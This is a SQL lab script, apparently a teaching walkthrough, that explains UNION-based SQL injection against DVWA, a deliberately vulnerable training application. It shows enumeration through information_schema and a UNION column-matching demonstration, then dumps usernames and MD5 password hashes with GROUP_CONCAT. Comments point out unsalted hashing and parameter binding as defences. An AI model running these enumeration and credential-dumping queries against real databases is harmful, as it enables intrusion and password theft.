sql注入语句背后的原理

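#List the tables of the dvwa schema, de-duplicated.
#information_schema.COLUMNS holds one row per column, so DISTINCT collapses
#the repeats per table. The table is schema-qualified here so the statement
#no longer depends on information_schema being the currently selected database.
#MySQL only shows an account the information_schema rows for objects it holds
#some privilege on, so an application account granted just the tables it needs
#exposes correspondingly less through this query.
#Expected result shape:
#TABLE_NAME
#users
#guestbook
SELECT DISTINCT 
  TABLE_NAME 
FROM
  information_schema.COLUMNS 
WHERE TABLE_SCHEMA = 'dvwa' ;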

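#Same table list, collapsed into a single row with GROUP_CONCAT.
#DISTINCT inside the aggregate plays the role DISTINCT played in the
#previous statement. Schema-qualified so the current database is irrelevant.
#Expected result:
#group_concat(distinct TABLE_NAME)
#guestbook,users
SELECT
  GROUP_CONCAT(DISTINCT TABLE_NAME)
FROM
  information_schema.COLUMNS 
WHERE TABLE_SCHEMA = 'dvwa' ;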

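#Table list as one row, with an explicit column alias.
#The alias is an identifier, so it is written unquoted rather than as the
#string literal 'tb_name' (MySQL tolerates the literal form, other engines
#reject it). Schema-qualified so the current database is irrelevant.
#data : guestbook,users
#Expected result:
#tb_name
#guestbook,users
SELECT 
  GROUP_CONCAT(DISTINCT TABLE_NAME) AS tb_name 
FROM
  information_schema.COLUMNS 
WHERE TABLE_SCHEMA = 'dvwa' ;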

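#List the column names of one table (dvwa.users) as a single row.
#Filtering on both TABLE_SCHEMA and TABLE_NAME matters: the same table name
#may exist in several schemas. Schema-qualified so the current database is
#irrelevant.
#data: avatar,failed_login,first_name,last_login,last_name,password,user,user_id
#Expected result:
#group_concat(distinct COLUMN_NAME)
#avatar,failed_login,first_name,last_login,last_name,password,user,user_id
SELECT 
  GROUP_CONCAT(DISTINCT COLUMN_NAME) 
FROM
  information_schema.COLUMNS 
WHERE TABLE_SCHEMA = 'dvwa' 
  AND TABLE_NAME = 'users' ;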


#Read the user and password columns of dvwa.users, one row per account.
#Columns are qualified through a table alias; the result header stays
#USER / PASSWORD because MySQL drops the qualifier from unaliased columns.
SELECT 
  u.USER,
  u.PASSWORD 
FROM
  dvwa.users AS u ;

#Collapse every user/password pair of dvwa.users into one comma-separated
#string, returned next to a constant second column (100).
#Expected output (header line, then the single result row):
#group_concat(user,'-->',password)	100
#admin-->5f4dcc3b5aa765d61d8327deb882cf99,
#gordonb-->e99a18c428cb38d5f260853678922e03,
#1337-->8d3533d75ae2c3966d7e0d4fcc69216b,
#pablo-->0d107d09f5bbe40cade3de5c71e9e9b7,
#smithy-->5f4dcc3b5aa765d61d8327deb882cf99	100
#NOTE(review): the stored password values are 32 hex characters, which looks
#like an unsalted MD5 digest; two accounts even share the same value. A
#salted, slow password hash (bcrypt/argon2) would make a dump of this column
#far less valuable -- confirm against the application's password handling.
SELECT 
  GROUP_CONCAT(USER, '-->', PASSWORD),
  100 
FROM
  dvwa.`users` ;

#sql语句要在指定的数据库中执行、生效
#

###############################################################################################

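#Hands-on: the SQL injection exercise in DVWA.
#Report the server version and the currently selected database.
#Aliases are identifiers, so they are written unquoted rather than as the
#string literals 'version' / 'db_name'; the result headers are unchanged.
SELECT VERSION() AS version, DATABASE() AS db_name;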


#Read the table_name values of information_schema.columns for the current
#database, i.e. use that table to learn which tables the dvwa database holds;
#VERSION() is returned alongside in a second column.
#The table carries an alias so the WHERE clause does not rely on the
#unqualified lower-case name `columns` resolving to it.
SELECT 
  GROUP_CONCAT(DISTINCT TABLE_NAME),
  VERSION() 
FROM
  information_schema.COLUMNS AS c 
WHERE c.TABLE_SCHEMA = DATABASE() ;

#How the UNION works.
#Every SELECT in a UNION must produce the same number of columns; dvwa.users
#has the 8 columns listed in the header below, so each branch supplies 8
#values. The constants 1..8 show which select-list position lands in which
#output column; the third branch places VERSION() in position 1 (8.0.12 in
#the sample row) and permutes the rest.
#user_id	first_name	last_name	user	password	avatar	last_login	failed_login
#1		2		3		4	5		6	7		8
#8.0.12		2		8		7	6		5	4		3
#NOTE(review): `user_id = - 2` matches no row in the sample output, so the
#base SELECT contributes nothing and only the two UNION branches are shown;
#confirm the table holds no negative ids.
#Defensive point: this only composes with the application's query when
#user_id is spliced into the statement text; binding it as a parameter keeps
#the value from being parsed as SQL at all.
SELECT 
  * 
FROM
  dvwa.`users` 
WHERE user_id = - 2 
UNION
SELECT 
  1,
  2,
  3,
  4,
  5,
  6,
  7,
  8 
UNION
SELECT 
  VERSION(),
  2,
  8,
  7,
  6,
  5,
  4,
  3 ;

#List the distinct column names of dvwa.users as one comma-separated row.
#Both the schema and the table are filtered, since the same table name can
#exist in several schemas. The table carries an alias so the WHERE clause
#does not rely on the unqualified lower-case name `columns` resolving to it.
#Expected result:
#GROUP_CONCAT(DISTINCT COLUMN_NAME)
#avatar,failed_login,first_name,last_login,last_name,password,user,user_id
SELECT 
  GROUP_CONCAT(DISTINCT COLUMN_NAME) 
FROM
  information_schema.COLUMNS AS c 
WHERE c.TABLE_SCHEMA = 'dvwa' 
  AND c.TABLE_NAME = 'users' ;

#Read the user and password values of dvwa.users, collapsed into one
#comma-separated string, next to a constant second column (100).
#Expected output (header line, then the single result row):
#group_concat(user,'-->',password)	        100
#admin-->5f4dcc3b5aa765d61d8327deb882cf99,
#gordonb-->e99a18c428cb38d5f260853678922e03,
#1337-->8d3533d75ae2c3966d7e0d4fcc69216b,
#pablo-->0d107d09f5bbe40cade3de5c71e9e9b7,
#smithy-->5f4dcc3b5aa765d61d8327deb882cf99	100
#This is the same statement as the one in the first section above; it is
#repeated here as the final step of the hands-on walkthrough.
SELECT 
  GROUP_CONCAT(USER, '-->', PASSWORD),
  100 
FROM
  dvwa.`users` ;

#完毕

